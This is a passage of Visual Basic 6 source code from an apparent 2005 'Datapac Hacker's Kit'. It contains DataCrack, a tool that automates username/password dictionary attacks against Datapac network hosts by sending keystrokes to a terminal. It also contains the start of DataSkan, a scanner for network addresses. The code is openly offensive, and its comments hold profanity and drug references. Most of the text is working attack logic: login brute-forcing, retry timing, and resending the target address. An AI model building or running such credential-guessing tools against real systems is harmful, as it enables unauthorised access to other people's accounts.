1335 End Begin VB.CommandButton cmdhelp Caption = "Help" Height = 735 Left = 3000 TabIndex = 33 Top = 4440 Width = 1335 End Begin VB.Frame Frame4 Caption = "Stats and results:" Height = 1095 Left = 0 TabIndex = 24 Top = 3240 Width = 4335 Begin VB.Shape Shape1 BackColor = &H000000FF& BackStyle = 1 'Opaque BorderColor = &H00FF0000& FillColor = &H000000FF& FillStyle = 0 'Solid Height = 375 Left = 3120 Shape = 2 'Oval Top = 240 Width = 975 End Begin VB.Label lbltimerunning BorderStyle = 1 'Fixed Single Height = 255 Left = 2400 TabIndex = 32 ToolTipText = "time the attack started at" Top = 720 Width = 1815 End Begin VB.Label Label17 Caption = "Running since:" Height = 375 Left = 1680 TabIndex = 31 Top = 600 Width = 735 End Begin VB.Label lblpercentcomplete BorderStyle = 1 'Fixed Single Height = 255 Left = 840 TabIndex = 30 ToolTipText = "percentage complete" Top = 720 Width = 735 End Begin VB.Label Label15 Caption = "% complete:" Height = 435 Left = 120 TabIndex = 29 Top = 600 Width = 705 End Begin VB.Label lbltotalcycle BorderStyle = 1 'Fixed Single Height = 255 Left = 2160 TabIndex = 28 ToolTipText = "total cycle count" Top = 240 Width = 735 End Begin VB.Label Label13 Caption = "of:" Height = 255 Left = 1800 TabIndex = 27 Top = 240 Width = 255 End Begin VB.Label lblcurrentcycle BorderStyle = 1 'Fixed Single Caption = "0" Height = 255 Left = 840 TabIndex = 26 ToolTipText = "current cycle count" Top = 240 Width = 735 End Begin VB.Label Label11 Caption = "on cycle: " Height = 255 Left = 120 TabIndex = 25 Top = 240 Width = 735 End End Begin MSComDlg.CommonDialog CommonDialog1 Left = 3720 Top = 2640 _ExtentX = 847 _ExtentY = 847 _Version = 393216 End Begin VB.Timer Timer4 Left = 3840 Top = 1440 End Begin VB.Timer Timer3 Left = 3840 Top = 1320 End Begin VB.Timer Timer2 Left = 3840 Top = 1200 End Begin VB.Timer Timer1 Left = 3840 Top = 1080 End Begin VB.Frame Frame3 Caption = "Timing" Height = 1335 Left = 0 TabIndex = 13 Top = 1920 Width = 4335 Begin VB.TextBox txtwaitpassword Height = 285 Left = 600 TabIndex = 21 Text = "2000" ToolTipText = "this is the amount of time to wait before the password is sent." Top = 960 Width = 735 End Begin VB.TextBox txtwaitusername Height = 285 Left = 600 TabIndex = 18 Text = "2000" ToolTipText = "this is the amount of seconds to wait after the username is sent" Top = 600 Width = 735 End Begin VB.TextBox txtwaitsendkeys Height = 285 Left = 600 TabIndex = 15 Text = "3000" ToolTipText = "this is the amount of time you wait before the attack starts" Top = 240 Width = 735 End Begin VB.Label Label10 AutoSize = -1 'True Caption = "Miliseconds after password is sent" Height = 195 Left = 1440 TabIndex = 22 Top = 960 Width = 2400 End Begin VB.Label Label9 AutoSize = -1 'True Caption = "Wait" Height = 195 Left = 120 TabIndex = 20 Top = 960 Width = 330 End Begin VB.Label Label8 AutoSize = -1 'True Caption = "Miliseconds after username is sent" Height = 195 Left = 1440 TabIndex = 19 Top = 600 Width = 2415 End Begin VB.Label Label7 AutoSize = -1 'True Caption = "Wait" Height = 195 Left = 120 TabIndex = 17 Top = 600 Width = 330 End Begin VB.Label Label6 AutoSize = -1 'True Caption = "Miliseconds before starting SendKeys()" Height = 195 Left = 1440 TabIndex = 16 Top = 240 Width = 2730 End Begin VB.Label Label5 AutoSize = -1 'True Caption = "Wait" Height = 195 Left = 120 TabIndex = 14 Top = 240 Width = 330 End End Begin VB.Frame Frame2 Caption = "NUA Address" Height = 975 Left = 0 TabIndex = 7 Top = 960 Width = 4335 Begin VB.CheckBox chkperiod Caption = "send period(.)" Height = 375 Left = 3240 TabIndex = 23 ToolTipText = "this sends the period that initates the datapac connection" Top = 480 Width = 975 End Begin VB.TextBox txtsendaddress Enabled = 0 'False Height = 285 Left = 1680 TabIndex = 11 Text = "1" ToolTipText = "send the address every n cycle. Use this if you only get three tries per session with the target host." Top = 600 Width = 375 End Begin VB.CheckBox chkaddress Caption = "send address more than once" Height = 375 Left = 1320 TabIndex = 9 ToolTipText = "check this box if you need to send the address more than once (use if you only get three tries before disconnect etc)" Top = 120 Width = 2415 End Begin VB.TextBox txtaddress Height = 285 Left = 120 TabIndex = 8 Text = "10000500" ToolTipText = "put the datapac address here" Top = 240 Width = 1095 End Begin VB.Label Label4 Caption = "Cycle(s)" Enabled = 0 'False Height = 255 Left = 2160 TabIndex = 12 Top = 600 Width = 615 End Begin VB.Label Label3 Caption = "Send Address every:" Enabled = 0 'False Height = 255 Left = 120 TabIndex = 10 Top = 600 Width = 1575 End End Begin VB.Frame Frame1 Caption = "File Paths" Height = 975 Left = 0 TabIndex = 0 Top = 0 Width = 4335 Begin VB.CheckBox chkusername Caption = "Check1" Height = 255 Left = 3600 TabIndex = 58 ToolTipText = "uncheck this if you only need to use passwords" Top = 240 Value = 1 'Checked Width = 255 End Begin VB.CommandButton cmdcommondialog2 Caption = "..." Height = 255 Left = 3960 TabIndex = 6 ToolTipText = "change path" Top = 600 Width = 255 End Begin VB.TextBox txtpasswords Height = 285 Left = 960 TabIndex = 5 Text = "c:\pw.txt" ToolTipText = "path to the file with the password list" Top = 600 Width = 2895 End Begin VB.CommandButton cmdcommondialog1 Caption = "..." Height = 255 Left = 3960 TabIndex = 3 ToolTipText = "change path" Top = 240 Width = 255 End Begin VB.TextBox txtusernames Height = 285 Left = 960 TabIndex = 1 Text = "c:\users.txt" ToolTipText = "path to the file with the usernames" Top = 240 Width = 2535 End Begin VB.Label Label2 Caption = "passwords:" Height = 255 Left = 120 TabIndex = 4 Top = 600 Width = 855 End Begin VB.Label Label1 Caption = "usernames:" Height = 255 Left = 120 TabIndex = 2 Top = 240 Width = 855 End End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'yet another program that has to do with datapac hacking and uses the sendkeys() function 'god dayum. I wish my modem wasnt such a stupid peice of shit or i'd be using 'the mscomm component right now. Stupid stupid stupid stupid fucking modem D: 'Oh, and about this code. It was extreemly hard for me to write because of the 'variable names I used. If you dont understand, you will in a minute.. 'i dedicate this program to the memory of Doctor Hunter S Thompson. 'Hunter was a good man. He spoke truth in his words. 'Long live the memory of the good doctor. 'RIP HST Public hst, gonzo As String Public lsd, hells_anges, strippers, american_dream As Boolean Public mescaline As Integer Public fuck_nixon, fear_and_loathing, lono, generation, sheriff, white_rabbit, politics As Integer Private Sub chkaddress_Click() If chkaddress.Value = Checked Then Label3.Enabled = True txtsendaddress.Enabled = True Label4.Enabled = True Else Label3.Enabled = False txtsendaddress.Enabled = False Label4.Enabled = False End If End Sub Private Sub cmdcommondialog1_Click() CommonDialog1.ShowOpen txtusernames.Text = CommonDialog1.FileName End Sub Private Sub cmdcommondialog2_Click() CommonDialog1.ShowOpen txtpasswords.Text = CommonDialog1.FileName End Sub Private Sub cmdhelp_Click() frmAbout.Show End Sub Private Sub cmdstart_Click() 'ok. this is where everything starts. Close lsd = False strippers = False american_dream = False fuck_nixon = 1 generation = 0 lono = 0 mescaline = 0 white_rabbit = 1 politics = 0 fear_and_loathing = 0 Shape1.FillColor = vbYellow cmdstop.Default = True cmdstart.Enabled = False If txtusernamecycles.Text <> 0 Or txtusernamecycles.Text <> "" Then strippers = True sheriff = txtusernamecycles.Text End If If txtpasscycle.Text <> 0 Or txtpasscycle.Text <> "" Then american_dream = True politics = txtpasscycle.Text End If lbltimerunning.Caption = Date & " " & Time Dim nixon As String 'nixon is a dummy variable. nixon is also a dummy. 'we analyze the very last entery in the usernames. if the very last usrname is not jsmith 'then we add it. we do this because there is an off by one error some where in here, and 'god damn it, i cant find it. So im going to take the easy way out and make sure every 'username that the attacker wants to be used is in there, + one bogus one. Open txtusernames.Text For Input As #1 DoEvents Do Until EOF(1) Line Input #1, nixon DoEvents Loop Close #1 If nixon <> "jsmith" Then Open txtusernames.Text For Append As #1 DoEvents Print #1, vbCrLf Print #1, "jsmith" DoEvents Close #1 DoEvents End If 'ok here we calculate how far we do this shit Open txtusernames.Text For Input As #1 DoEvents Do Until EOF(1) Line Input #1, nixon lono = lono + 1 DoEvents Loop Close #1 DoEvents Open txtpasswords.Text For Input As #1 DoEvents Do Until EOF(1) Line Input #1, nixon generation = generation + 1 DoEvents Loop Close #1 Dim mojo_machine As Integer mojo_machine = generation * (lono - 1) DoEvents lbltotalcycle.Caption = mojo_machine DoEvents 'setting timer1s interval Timer1.Interval = txtwaitsendkeys.Text 'opening the username and passwords Open txtusernames.Text For Input As #1 DoEvents Open txtpasswords.Text For Input As #2 DoEvents Timer1.Enabled = True End Sub Private Sub cmdstop_Click() cmdstart.Enabled = True lsd = True Shape1.FillColor = vbRed End Sub Private Sub Timer1_Timer() 'this is the preliminary timer. here we do things like send the datapac address 'and initate the datapac connection with a period and set the second timers interval. ' 'this timer is mainly to give the user some seconds to switch over to the terminal client 'lsd is to check if the user stoped the attack. lsd is also for getting high on. If lsd = True Then Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Timer4.Enabled = False Exit Sub End If Shape1.FillColor = vbGreen If chkperiod.Value = True Then SendKeys (".") Timer2.Interval = txtwaitusername.Text Timer1.Enabled = False Timer2.Enabled = True 'hst is the username we will send. Line Input #1, hst DoEvents SendKeys (txtaddress.Text) SendKeys (vbCr) DoEvents 'ok. we need to check here if we send shit after we send the address. If txtaddress1.Text <> "" Then Timer6.Interval = txtwaitusername.Text Timer6.Enabled = True Timer2.Enabled = False End If End Sub Private Sub Timer2_Timer() 'this is the function where we send the username 'lsd is to check if the user stoped the attack. lsd is also for getting high on. If lsd = True Then Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Timer4.Enabled = False Exit Sub End If DoEvents If chkusername.Value = Checked Then SendKeys (hst) End If 'SendKeys (vbCr) DoEvents 'update % complete lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%" If strippers = True Then 'if there is extra data to send then.. 'first we check to see if it is our time to go 'white rabbit by jefferson airplane. l33t s0ng3zwh0rz white_rabbit = white_rabbit + 1 'this is for debugging and seeing what exactly is going on in the code ' SendKeys (" white rabbit: " & white_rabbit) ' SendKeys (vbCr) ' SendKeys ("sheriff: " & sheriff) ' SendKeys (vbCr) DoEvents ' MsgBox "white rabbit: " & white_rabbit & " txtcycle: " & txtusernamecycles.Text If txtusernamecycles.Text <= white_rabbit Then 'MsgBox "inside of the whore!" white_rabbit = 0 Timer4.Interval = txtwaitusername.Text Timer4.Enabled = True Timer2.Enabled = False Exit Sub End If End If Timer2.Enabled = False Timer3.Interval = txtwaitusername.Text Timer3.Enabled = True DoEvents If EOF(1) = True Then 'if its the end of the usernames then we are fucking done! Close #1 Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Timer4.Enabled = False Shape1.FillColor = vbYellow End If End Sub Private Sub Timer3_Timer() 'this is the function where we send the password lblcurrentcycle.Caption = lblcurrentcycle.Caption + 1 'lsd is to check if the user stoped the attack. lsd is also for getting high on. If lsd = True Then MsgBox "USER STOPPED ATTACK!" Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Timer4.Enabled = False Exit Sub End If 'gonzo is the password we will send. Gonzo is also the type of journalism that hst 'invented gonzo is writen on the fly, often tape recorded then sent to print without 'editing or censorship. The results are often shocking and brutaly honest. Line Input #2, gonzo DoEvents If EOF(2) = True Then Close #2 DoEvents Open txtpasswords.Text For Input As #2 DoEvents If EOF(1) = False Then Line Input #1, hst End If SendKeys (gonzo) SendKeys (vbCr) 'ooooookah. its 2 am and im getting tired already. i must be getting old. anyways.. 'this part is for if you need to send extra data to the target AFTER the username 'and password how about some unnessesary freestyle rap in the comments of this code? 'yo im MC code, and i rode in on a battle ship node to e-quip the hommies of datapac. 'its one fifty subseven eleven am and im about to get a snack to keep me typin. 'Listening to some crazy trance has got me hypin. the buildup about to explode, fuck 'fuck fucking code off by one fence post error, i swear, if that happens again like 'shit. fucking dandy. it took all day to get that shit correct. if some one says this 'shit is easy they are going to get decked by my phree style hip hop wizardry like 'potter harrey knows. thats the way the shit goes. hoes on adrenochrome want my t00lz. 'dead cow rulez. eat it for breakfast, brunch and lunch. i got a hunch but not like back, 'more like a camel, lord's on track while chrak is on teh rock like crack. fuck talk, we 'want war on the whitehat. fuck a packet, i'll get my bat, like luisville. im up till dawn, 'but i dont drink coffie. the rush of the command prompt got me high like the dope of a 'poppy. i am not afraid to use public variables. its only sloppy to the noobies who fear 'the unstructured source. i endorse THC the hackers choice like doobies and bongs. two 'wrongs make a left. i hit that shit till there aint none left. bust out the bong until 'the sun hits the lawn then thats when i pass out. my kung fu is strong. props to thompson 'hunter s g. RIP. for skeezy. he was down with all of us. he was a hommie. mescaline = mescaline + 1 If mescaline = txtpasscycle.Text Then Timer5.Interval = txtwaitpassword.Text DoEvents mescaline = 0 Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Timer4.Enabled = False Timer5.Enabled = True Exit Sub End If Timer3.Enabled = False Timer2.Enabled = True DoEvents '!@#$ 'we check to see if we need to send the address again If chkaddress.Value = Checked Then fear_and_loathing = fear_and_loathing + 1 If fear_and_loathing = txtsendaddress.Text Then SendKeys (txtaddress.Text) SendKeys (vbCr) fear_and_loathing = 0 If txtaddress1.Text <> "" Then 'disabling timer 2, but we will enable it after 'we send the shit we need Timer6.Interval = txtwaitpassword.Text Timer6.Enabled = True Timer2.Enabled = False End If End If End If 'update % complete lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%" End Sub Private Sub Timer4_Timer() 'here we send any extra data after the username gets sent Dim army_newspaper As String army_newspaper = txtusernamesend1.Text If txtusernamecycles.Text <> "0" Or txtusernamecycles.Text <> "" Then If txtusernamereturn.Enabled = True And chkusername.Value = Checked Then SendKeys (vbCr) End If SendKeys (army_newspaper) End If DoEvents 'time for a 15 minute interbitchin. time for some poopcorn and sodapoop ' 'If txtusernamecycles.Text = "0" Or txtusernamecycles.Text = "" Then ' Timer1.Enabled = False ' Timer2.Enabled = False ' Timer3.Enabled = True ' Timer4.Enabled = False ' Timer5.Enabled = False ' Exit Sub 'End If 'now we send extra cartrage returns if needed If txtusernamereturn.Text <> "0" Or txtusernamereturn.Text <> "" Then Dim opium, hippies As Integer opium = txtusernamereturn.Text If chkusername.Value = Checked Then For hippies = 0 To opium SendKeys (vbCr) DoEvents Next hippies End If End If 'update % complete lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%" 'now we return to our regularily scheduled programming Timer3.Interval = txtwaitusername.Text Timer3.Enabled = True Timer4.Enabled = False 'rem this out if it shows fuqsonz in the next run If EOF(1) = True Then 'if its the end of the usernames then we are fucking done! Close #1 Timer1.Enabled = False Timer2.Enabled = False Timer3.Enabled = False Timer4.Enabled = False Shape1.FillColor = vbYellow End If End Sub Private Sub Timer5_Timer() 'this is for the extra data to send after the password is sent 'for example, you might have to send "login" or "logon" 'or "user" and then "login" 'or select from a menu 'like a sample log file might look like this: ' DATAPAC COMPUTERZ()R! 'select from list: ' '1) accounting '2) security '3) porn folder '4) networking ' '>2 ' ' You choose security! Please enter your login name 'USERNAME:XXXXX 'PASSWORD:XXXXX 'SORRY USERLOGIN FUCKING WRONG! ' 'select from list: ' '1) accounting '2) security '3) porn folder 'etc etc '....as you can see for this one, once you have a wrong username and password 'you have to enter from the list again before you can attempt to login. 'MsgBox "HELLO!" If txtpasssend1.Text <> "" Or txtpasscycle.Text <> "0" Then If txtpassreturn.Enabled = True Then SendKeys (txtpasssend1.Text) SendKeys (vbCr) DoEvents End If End If 'sending extra return keys (if needed) If txtpassreturn.Text <> "" And txtpassreturn.Text <> "0" Then Dim okanfold, clinton As Integer okanfold = txtpassreturn.Text For clinton = 1 To okanfold SendKeys (vbCr) DoEvents Next clinton DoEvents End If Timer5.Enabled = False Timer4.Enabled = False Timer3.Enabled = False Timer2.Enabled = True DoEvents 'wewt! it's only 2:30am and im already having visual halucinations from sleep deprivation! 'i thought i saw my cat walk into the room, but she didnt walk into the room. 'i've probiby been having autidutory halucinations as well, but this awesome hard hard 'house i've been listening to is masking dat shit ' 'sleep deprivation rules! ' 'its also making me mad. fucking stupid timers! why cant vb just have a sleep() funciton 'like in qbasic 'fuckfuckfuck i am angry. 'fuck Exit Sub End Sub Private Sub Timer6_Timer() 'alrighty. this is the first part of what we need to send after we send an address. ' after we do whatever is needed to be done in this function, we need to re-enable 'timer2. SendKeys (txtaddress1.Text) DoEvents SendKeys (vbCr) If txtaddressreturn.Enabled = True Then Dim shotgun, target_practice As Integer shotgun = txtaddressreturn.Text For target_practice = 1 To shotgun SendKeys (crlf) DoEvents Next target_practice DoEvents End If Timer6.Enabled = False Timer2.Enabled = True End Sub Private Sub txtaddress1_Change() If txtaddress1.Text <> "" Then txtaddressreturn.Enabled = True Else txtaddressreturn.Enabled = False End If End Sub Private Sub txtpasssend1_Change() If txtpasssend1.Text <> "" Then txtpassreturn.Enabled = True txtpasscycle.Enabled = True Else txtpassreturn.Enabled = False txtpasscycle.Enabled = False End If End Sub Private Sub txtusernamesend1_Change() If txtusernamesend1.Text <> "" Then txtusernamecycles.Enabled = True txtusernamereturn.Enabled = True End If If txtusernamesend1.Text = "" Then txtusernamecycles.Enabled = False txtusernamereturn.Enabled = False End If End Sub - frmAbout.FRM: VERSION 5.00 Begin VB.Form frmAbout BorderStyle = 3 'Fixed Dialog Caption = "About MyApp" ClientHeight = 2865 ClientLeft = 2340 ClientTop = 1935 ClientWidth = 5730 ClipControls = 0 'False Icon = "frmAbout.frx":0000 LinkTopic = "Form2" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 1977.474 ScaleMode = 0 'User ScaleWidth = 5380.766 ShowInTaskbar = 0 'False Begin VB.PictureBox picIcon AutoSize = -1 'True ClipControls = 0 'False Height = 540 Left = 240 Picture = "frmAbout.frx":0152 ScaleHeight = 337.12 ScaleMode = 0 'User ScaleWidth = 337.12 TabIndex = 1 Top = 240 Width = 540 End Begin VB.CommandButton cmdOK Cancel = -1 'True Caption = "OK" Default = -1 'True Height = 465 Left = 4320 TabIndex = 0 Top = 2040 Width = 1380 End Begin VB.Label lblDescription Caption = $"frmAbout.frx":02A4 ForeColor = &H00000000& Height = 690 Left = 90 TabIndex = 2 Top = 1080 Width = 5205 End Begin VB.Label lblTitle Caption = "DataCrack" ForeColor = &H00000000& Height = 480 Left = 1050 TabIndex = 4 Top = 240 Width = 3885 End Begin VB.Label lblVersion Caption = "Version" Height = 225 Left = 1050 TabIndex = 5 Top = 780 Width = 3885 End Begin VB.Label lblDisclaimer Caption = $"frmAbout.frx":0360 ForeColor = &H00000000& Height = 1065 Left = 135 TabIndex = 3 Top = 1800 Width = 3990 End End Attribute VB_Name = "frmAbout" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Option Explicit ' Reg Key Security Options... Const READ_CONTROL = &H20000 Const KEY_QUERY_VALUE = &H1 Const KEY_SET_VALUE = &H2 Const KEY_CREATE_SUB_KEY = &H4 Const KEY_ENUMERATE_SUB_KEYS = &H8 Const KEY_NOTIFY = &H10 Const KEY_CREATE_LINK = &H20 Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + _ KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + _ KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL ' Reg Key ROOT Types... Const HKEY_LOCAL_MACHINE = &H80000002 Const ERROR_SUCCESS = 0 Const REG_SZ = 1 ' Unicode nul terminated string Const REG_DWORD = 4 ' 32-bit number Const gREGKEYSYSINFOLOC = "SOFTWARE\Microsoft\Shared Tools Location" Const gREGVALSYSINFOLOC = "MSINFO" Const gREGKEYSYSINFO = "SOFTWARE\Microsoft\Shared Tools\MSINFO" Const gREGVALSYSINFO = "PATH" Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long Private Sub cmdSysInfo_Click() Call StartSysInfo End Sub Private Sub cmdOK_Click() Unload Me End Sub Private Sub Form_Load() Me.Caption = "About " & App.Title lblVersion.Caption = "Version " & App.Major & "." & App.Minor & "." & App.Revision lblTitle.Caption = App.Title End Sub Public Sub StartSysInfo() On Error GoTo SysInfoErr Dim rc As Long Dim SysInfoPath As String ' Try To Get System Info Program Path\Name From Registry... If GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFO, gREGVALSYSINFO, SysInfoPath) Then ' Try To Get System Info Program Path Only From Registry... ElseIf GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFOLOC, gREGVALSYSINFOLOC, SysInfoPath) Then ' Validate Existance Of Known 32 Bit File Version If (Dir(SysInfoPath & "\MSINFO32.EXE") <> "") Then SysInfoPath = SysInfoPath & "\MSINFO32.EXE" ' Error - File Can Not Be Found... Else GoTo SysInfoErr End If ' Error - Registry Entry Can Not Be Found... Else GoTo SysInfoErr End If Call Shell(SysInfoPath, vbNormalFocus) Exit Sub SysInfoErr: MsgBox "System Information Is Unavailable At This Time", vbOKOnly End Sub Public Function GetKeyValue(KeyRoot As Long, KeyName As String, SubKeyRef As String, ByRef KeyVal As String) As Boolean Dim i As Long ' Loop Counter Dim rc As Long ' Return Code Dim hKey As Long ' Handle To An Open Registry Key Dim hDepth As Long ' Dim KeyValType As Long ' Data Type Of A Registry Key Dim tmpVal As String ' Tempory Storage For A Registry Key Value Dim KeyValSize As Long ' Size Of Registry Key Variable '------------------------------------------------------------ ' Open RegKey Under KeyRoot {HKEY_LOCAL_MACHINE...} '------------------------------------------------------------ rc = RegOpenKeyEx(KeyRoot, KeyName, 0, KEY_ALL_ACCESS, hKey) ' Open Registry Key If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Error... tmpVal = String$(1024, 0) ' Allocate Variable Space KeyValSize = 1024 ' Mark Variable Size '------------------------------------------------------------ ' Retrieve Registry Key Value... '------------------------------------------------------------ rc = RegQueryValueEx(hKey, SubKeyRef, 0, _ KeyValType, tmpVal, KeyValSize) ' Get/Create Key Value If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Errors If (Asc(Mid(tmpVal, KeyValSize, 1)) = 0) Then ' Win95 Adds Null Terminated String... tmpVal = Left(tmpVal, KeyValSize - 1) ' Null Found, Extract From String Else ' WinNT Does NOT Null Terminate String... tmpVal = Left(tmpVal, KeyValSize) ' Null Not Found, Extract String Only End If '------------------------------------------------------------ ' Determine Key Value Type For Conversion... '------------------------------------------------------------ Select Case KeyValType ' Search Data Types... Case REG_SZ ' String Registry Key Data Type KeyVal = tmpVal ' Copy String Value Case REG_DWORD ' Double Word Registry Key Data Type For i = Len(tmpVal) To 1 Step -1 ' Convert Each Bit KeyVal = KeyVal + Hex(Asc(Mid(tmpVal, i, 1))) ' Build Value Char. By Char. Next KeyVal = Format$("&h" + KeyVal) ' Convert Double Word To String End Select GetKeyValue = True ' Return Success rc = RegCloseKey(hKey) ' Close Registry Key Exit Function ' Exit GetKeyError: ' Cleanup After An Error Has Occured... KeyVal = "" ' Set Return Val To Empty String GetKeyValue = False ' Return Failure rc = RegCloseKey(hKey) ' Close Registry Key End Function - Project1.VBP: Type=Exe Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\System32\stdole2.tlb#OLE Automation Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX Form=Form1.frm Form=frmAbout.frm IconForm="Form1" Startup="Form1" HelpFile="" Title="Datacrack" ExeName32="datacrack.exe" Path32="..\Binary" Command32="" Name="Datacrack" HelpContextID="0" Description="datapac dictionary attacker" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 VersionCompanyName="Aftermath" VersionFileDescription="Datapac Dictionary Attacker" VersionLegalCopyright="Copyleft Feburary 2005" CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 [MS Transaction Server] AutoRefresh=1 - Project1.VBW: Form1 = 96, 129, 543, 511, I, 0, 0, 0, 0, C frmAbout = 0, 0, 0, 0, C, 0, 0, 0, 0, C -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Datapac Hacker's Kit: DataSkan Source Code by: Aftermath Download it at: http://www.hackcanada.com/canadian/hacking/datapac_hackers_kit.rar According to Hack Canada: "Includes the Datascan NUA scanner and the Datacrack username/password dictionary attacker for windows. VB source code included." (Notes: Form1.FRX, Form2.FRX, Form3.FRX, and frmAbout.FRX excluded due to mangled code) - Form1.FRM: VERSION 5.00 Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX" Begin VB.Form Form1 BorderStyle = 1 'Fixed Single Caption = "DataSkan" ClientHeight = 6285 ClientLeft = 1005 ClientTop = 1575 ClientWidth = 5775 Icon = "Form1.frx":0000 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 6285 ScaleWidth = 5775 Begin MSComDlg.CommonDialog CommonDialog1 Left = 4080 Top = 0 _ExtentX = 847 _ExtentY = 847 _Version = 393216 End Begin VB.Timer Timer3 Left = 3600 Top = 0 End Begin VB.Frame Frame4 Caption = "Lists" Height = 615 Left = 0 TabIndex = 31 ToolTipText = "You can use a list rather than scan a range" Top = 2640 Width = 5775 Begin VB.CommandButton cmdcommon1 Caption = "..." Enabled = 0 'False Height = 255 Left = 5400 TabIndex = 38 Top = 240 Width = 255 End Begin VB.TextBox txtlist Enabled = 0 'False Height = 285 Left = 2280 TabIndex = 33 Text = "C:\Documents and Settings\Administrator\list.TXT" ToolTipText = "location of list file" Top = 240 Width = 3015 End Begin VB.CheckBox chklist Caption = "Use List" Height = 255 Left = 120 TabIndex = 32 ToolTipText = "check this box if you wish to use a list instead of scan a range" Top = 240 Width = 975 End Begin VB.Label Label17 Caption = "location of list:" Enabled = 0 'False Height = 255 Left = 1200 TabIndex = 34 Top = 240 Width = 1095 End End Begin VB.CheckBox chkperiod Caption = "Send Period (.)" Height = 255 Left = 0 TabIndex = 21 ToolTipText = "a period initiates a datapac session." Top = 2280 Value = 1 'Checked Width = 1575 End Begin VB.Timer Timer2 Left = 3120 Top = 0 End Begin VB.TextBox txtconnectwait Height = 285 Left = 2160 TabIndex = 15 Text = "240" ToolTipText = "This is the time in miliseconds data will be sent to the terminal client. The lower the number the faster the scan." Top = 2280 Width = 375 End Begin VB.Timer Timer1 Left = 2640 Top = 0 End Begin VB.CommandButton cmdstop Caption = "Stop" Default = -1 'True Height = 495 Left = 0 TabIndex = 14 ToolTipText = "stop scanning" Top = 1080 Width = 1575 End Begin VB.CommandButton cmdstart Caption = "Start" Height = 495 Left = 0 TabIndex = 13 ToolTipText = "start skannin" Top = 1680 Width = 1575 End Begin VB.TextBox txtseconds Height = 285 Left = 2160 TabIndex = 10 Text = "3" ToolTipText = "this is the amount of seconds you will give yourself to switch over to the terminal client before keys are sent to the window" Top = 1920 Width = 375 End Begin VB.TextBox txtreturn Height = 285 Left = 2160 TabIndex = 7 Text = "1" ToolTipText = "the amount of times to send a cartrage return (enter) to datapac after every time you attempt to connect to an address." Top = 1560 Width = 375 End Begin VB.Frame Frame1 Caption = "Scan.." Height = 975 Left = 0 TabIndex = 0 ToolTipText = "This is where you set the range of addresses to scan" Top = 0 Width = 1935 Begin VB.TextBox txtto Height = 285 Left = 960 TabIndex = 37 Text = "9999" ToolTipText = "to" Top = 600 Width = 855 End Begin VB.TextBox txtfrom Height = 285 Left = 120 TabIndex = 36 Text = "0000" ToolTipText = "from" Top = 600 Width = 735 End Begin VB.TextBox txtrange Height = 285 Left = 960 TabIndex = 35 Text = "(4 digets)" ToolTipText = "First four numbers of every address that will be scanned." Top = 240 Width = 855 End Begin VB.Label Label1 Caption = "Range:" Height = 255 Left = 120 TabIndex = 1 Top = 240 Width = 495 End End Begin VB.Frame Frame2 Caption = "Time:" Height = 1455 Left = 2040 TabIndex = 2 ToolTipText = "Time to start and end" Top = 0 Width = 3735 Begin VB.CheckBox chkstop Caption = "Dont stop" Height = 375 Left = 2520 TabIndex = 30 ToolTipText = "check this box if you wish to not stop and continue scanning until range is complete or list is done" Top = 960 Width = 1095 End Begin VB.CheckBox chkfrom Caption = "From Now" Height = 255 Left = 2520 TabIndex = 29 ToolTipText = "Check this box if you wish to start scanning right away" Top = 480 Value = 1 'Checked Width = 1095 End Begin VB.TextBox txtfromampm Enabled = 0 'False Height = 285 Left = 1920 TabIndex = 28 Text = "AM" ToolTipText = "start in the AM or the PM" Top = 480 Width = 375 End Begin VB.TextBox txtfromseconds Enabled = 0 'False Height = 285 Left = 1320 TabIndex = 27 Text = "00" ToolTipText = "start seconds" Top = 480 Width = 375 End Begin VB.TextBox txtfromminutes Enabled = 0 'False Height = 315 Left = 720 TabIndex = 25 Text = "00" ToolTipText = "start minutes" Top = 480 Width = 375 End Begin VB.TextBox txtfromhours 